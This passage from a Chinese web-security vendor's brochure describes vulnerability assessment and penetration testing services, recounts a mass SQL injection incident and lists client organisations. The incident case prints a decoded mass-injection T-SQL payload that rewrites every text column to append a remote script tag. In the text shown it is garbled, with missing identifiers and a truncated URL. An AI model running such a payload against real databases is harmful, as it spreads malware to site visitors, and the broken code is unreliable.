【正文】 為，實(shí)時(shí)告警并通過(guò)各類方式通知給安全管理員，便于快速處理安全事件。 事后分析 提供詳細(xì)的 WEB 應(yīng)用攻擊訪問(wèn)日志，實(shí)現(xiàn)對(duì)攻擊源的定位分析，同時(shí)提供各類統(tǒng)計(jì)分析，方便掌握整個(gè)應(yīng)用系統(tǒng)的動(dòng)態(tài)安全狀況。 3 網(wǎng)站系統(tǒng)漏洞評(píng)估 專業(yè) 服務(wù) 漏洞評(píng)估服務(wù)概述 由于 WEB 應(yīng)用程序本身具有無(wú)法完全克服的安全漏洞，為黑客的入侵提供了可乘之機(jī)。 WEB 安全專業(yè)服務(wù)（ WEB Security Professional Service）通過(guò)專業(yè)的安全工具、白客級(jí)的專家團(tuán)隊(duì)，協(xié)助客戶對(duì) WEB 應(yīng)用進(jìn)行常規(guī)掃描、高頻度檢測(cè)，對(duì) WEB 應(yīng)用安全事件進(jìn)行成因分析、應(yīng)急修復(fù)。同時(shí)幫助安全開(kāi)發(fā)及維護(hù)人員及時(shí)了解安全知識(shí)、提升安全技能，從而切實(shí)增強(qiáng) WEB 應(yīng)用的整體抗風(fēng)險(xiǎn)能力。 服務(wù)內(nèi)容介紹 WEB 漏洞評(píng)估服務(wù)主要包含以下三大類、六方面： 領(lǐng)先的應(yīng)用安全及數(shù)據(jù)庫(kù)安全整體解決方案提供商 20 / 23 上海睿宏電子 科技 發(fā)展 有限公司 大類 子類 說(shuō)明 提交文檔 漏洞檢測(cè) SQL注入漏洞 SQL 注入漏洞產(chǎn)生原因是網(wǎng)站程序在編寫時(shí)，沒(méi)有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，導(dǎo)致應(yīng)用程序存在安全隱患 網(wǎng)站漏洞掃描報(bào)告 跨站腳本漏洞 跨站腳本攻擊簡(jiǎn)稱為 XSS 又稱 CSS，是指服務(wù)器端的 CGI程序沒(méi)有對(duì)用戶提交變量中的 HTML代碼進(jìn)行有效的過(guò)濾或轉(zhuǎn)換，允許攻擊者往 WEB 頁(yè)面里插入對(duì)終端用戶造成影響或損失的 HTML 代碼 相關(guān)漏洞檢測(cè) 檢測(cè)內(nèi)容包括： FORM檢測(cè)、 AJAX 注入檢測(cè)、中間人攻擊檢測(cè)、 X path注入檢測(cè)、 Cookies 注入檢測(cè)等 第三方軟件漏洞 第三方軟件漏洞一般是指網(wǎng)站后臺(tái)編輯器、服務(wù)器軟件如 IIS、 Apache 等本身可能存在的安全漏洞，導(dǎo)致對(duì)外服務(wù)網(wǎng)站存在入侵隱患 木馬檢測(cè) 由于應(yīng)用系統(tǒng)存在可被利用的安全漏洞，可能已被惡意人員進(jìn)行掛馬獲取相應(yīng)權(quán)限或用以傳播病毒 木馬檢查報(bào)告 滲透測(cè)試 在用戶授權(quán)的前提下，通過(guò)模擬黑客的攻擊方法對(duì) Web 應(yīng)用系統(tǒng)進(jìn)行非破壞性質(zhì)的攻擊性測(cè)試，目的是侵入系統(tǒng)，獲取系統(tǒng)控制權(quán)并將入侵的過(guò)程和細(xì)節(jié)產(chǎn)生報(bào)告給用戶，由此證實(shí) Web 應(yīng)用系統(tǒng)所存在的安全威脅和風(fēng)險(xiǎn)，并能及時(shí)提醒 Web 應(yīng)用系統(tǒng)管理員完善安全策略 網(wǎng)站滲透性測(cè)試報(bào)告 評(píng)估實(shí)踐介紹 國(guó)內(nèi)首次發(fā)現(xiàn)網(wǎng)站群注風(fēng)暴 領(lǐng)先的應(yīng)用安全及數(shù)據(jù)庫(kù)安全整體解決方案提供商 21 / 23 上海睿宏電子 科技 發(fā)展 有限公司 2021 年 5 月，公司安全研究服務(wù)團(tuán)隊(duì)在某網(wǎng)站應(yīng)急響應(yīng)中首次發(fā)現(xiàn)并處理了全球性的網(wǎng)站群注風(fēng)暴攻擊，并且在國(guó)內(nèi)首家發(fā)布了紅色預(yù)警。 網(wǎng)絡(luò)群注 (Mass Injection), 可以簡(jiǎn)單翻譯為巨量的 SQL 注入 (SQL Injection)。 SQL注入是一種目前最流行的利用網(wǎng)站應(yīng)用程序漏洞對(duì)數(shù)據(jù)庫(kù)以及服務(wù)器進(jìn)行攻擊的手段，這種攻擊可能是竊取數(shù)據(jù)、插入數(shù)據(jù)、篡改數(shù)據(jù)、刪除數(shù)據(jù)或者執(zhí)行任意命令以致直接控制服務(wù)器。 這類攻擊適用范圍極為廣泛，目前 80%以上的網(wǎng)站掛馬是出自這類攻擊，而群注則在單個(gè)網(wǎng)站攻擊的基礎(chǔ)上在自動(dòng)化和智能性方面更進(jìn)了一步， 也就是說(shuō) , 從發(fā)現(xiàn)網(wǎng)站目標(biāo)到發(fā)現(xiàn)漏洞點(diǎn)到注射木馬，全自動(dòng)一氣呵成 , 效率極高，很多國(guó)外著名的安全網(wǎng)站也慘遭毒手 , 更不用說(shuō)是國(guó)內(nèi)的許許多多防范不嚴(yán)的網(wǎng)站了。 某網(wǎng)站的群注攻擊解碼后： DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select , from sysobjects a,syscolumns b where = and =39。u39。 and (=99 or =35 or =231 or =167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(39。update [39。+@T+39。] set [39。+@C+39。]=rtrim(convert(varchar,[39。+@C+39。]))+39。39。script src= NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 類似的網(wǎng)站群注風(fēng)暴攻擊在過(guò)去的幾個(gè)月內(nèi)國(guó)外已經(jīng)連續(xù)發(fā)生了兩次，總共有十幾萬(wàn)個(gè)網(wǎng)站在短短幾天內(nèi)被無(wú)情摧殘 , 更重要的是 , 所有訪問(wèn)這些網(wǎng)站的無(wú)辜網(wǎng)民也成了最終的受害者，各類盜號(hào)木馬百花齊放。 領(lǐng)先的應(yīng)用安全及數(shù)據(jù)庫(kù)安全整體解決方案提供商 22 / 23 上海睿宏電子 科技 發(fā)展 有限公司 4 部 分用戶案例 行業(yè) 典型客戶 國(guó)家級(jí) /部級(jí) 農(nóng)科院、國(guó)家質(zhì)監(jiān)局 金融 中國(guó)銀行業(yè)監(jiān)督管理委員會(huì)、財(cái)通證券有限公司、英大泰和人壽保險(xiǎn)股份有限公司、浙商證券有限責(zé)任公司、寧波銀行、諸暨農(nóng)村合作銀行、浙江禾城農(nóng)村合作銀行、浙江瑞安農(nóng)村合作銀行、浙江定海農(nóng)村合作銀行、浙江樂(lè)清農(nóng)村合作銀行 運(yùn)營(yíng)商 中國(guó)移動(dòng)通信集團(tuán)陜西有限公司、山西移動(dòng)、中國(guó)網(wǎng)絡(luò)通信集團(tuán)公司浙江省分公司、中國(guó)聯(lián)通、江蘇聯(lián)通南京分公司 ICT、江門移動(dòng) 電力能源 無(wú)錫華潤(rùn)燃?xì)庥邢薰? 政府 湖州市信息中心、天津市電子政務(wù)中心、江蘇省人民政府外事辦公室、江蘇省勞動(dòng)和社會(huì)保障廳、蘇州市園林和綠化管理局、江西省信息產(chǎn)業(yè)廳、浙江省人民政府外事辦公室、浙江省人民政府國(guó)有資產(chǎn)監(jiān)督管理委員會(huì)、浙江省財(cái)政廳、浙江省國(guó)土資源廳、浙江省信息產(chǎn)業(yè)廳、浙江省科技廳、浙江省交通廳、浙江省氣象 局、浙江省道路運(yùn)輸管理局、浙江省廣播電視局、杭州市中級(jí)人民法院 、上海市勞動(dòng)保障宣傳教育中心 公安 公安部等級(jí)保護(hù)測(cè)評(píng)中心、溫州市公安局、嘉興交警、嘉興公安局 醫(yī)療 北京積水潭醫(yī)院 教育 浙江警官職業(yè)學(xué)院、寧波理工學(xué)院、昆明理工 大學(xué)、浙江省工商職業(yè)技術(shù)學(xué)院、溫州大學(xué)城市學(xué)院、上海教育網(wǎng)絡(luò)圖書館、 領(lǐng)先的應(yīng)用安全及數(shù)據(jù)庫(kù)安全整體解決方案提供商 23 / 23 上海睿宏電子 科技 發(fā)展 有限公司 雅安職業(yè)技術(shù)學(xué)院 稅務(wù) 浙江省國(guó)家稅務(wù)局、浙江省地方稅務(wù)局、保山市地方稅務(wù)局、蘇州地稅、嘉興市地稅局 工商 陜西工商行政管理局、杭州市工商局、浙江省工商行政管理局、 社保 蘭州市人力資源和社會(huì)保障局 測(cè)評(píng)機(jī)構(gòu) 浙江省電子產(chǎn)品檢驗(yàn)所 其他 中國(guó)水利集團(tuán)、寧波電視臺(tái)、杭州蕭山國(guó)際機(jī)場(chǎng)、中國(guó)水利水電第八工程局有限公司、中國(guó)水電工程顧問(wèn)集團(tuán)公司、鄭州日?qǐng)?bào)、中山市慈善總會(huì)網(wǎng)站、上海方正信息安全技術(shù)有限公司、杭州格格數(shù)碼科技有限公司、北京聯(lián)信永益科技有限公司、寧波日?qǐng)?bào)報(bào)業(yè)集團(tuán)、重慶有線電視網(wǎng)絡(luò)有限公司、寧波三生日用品有限公司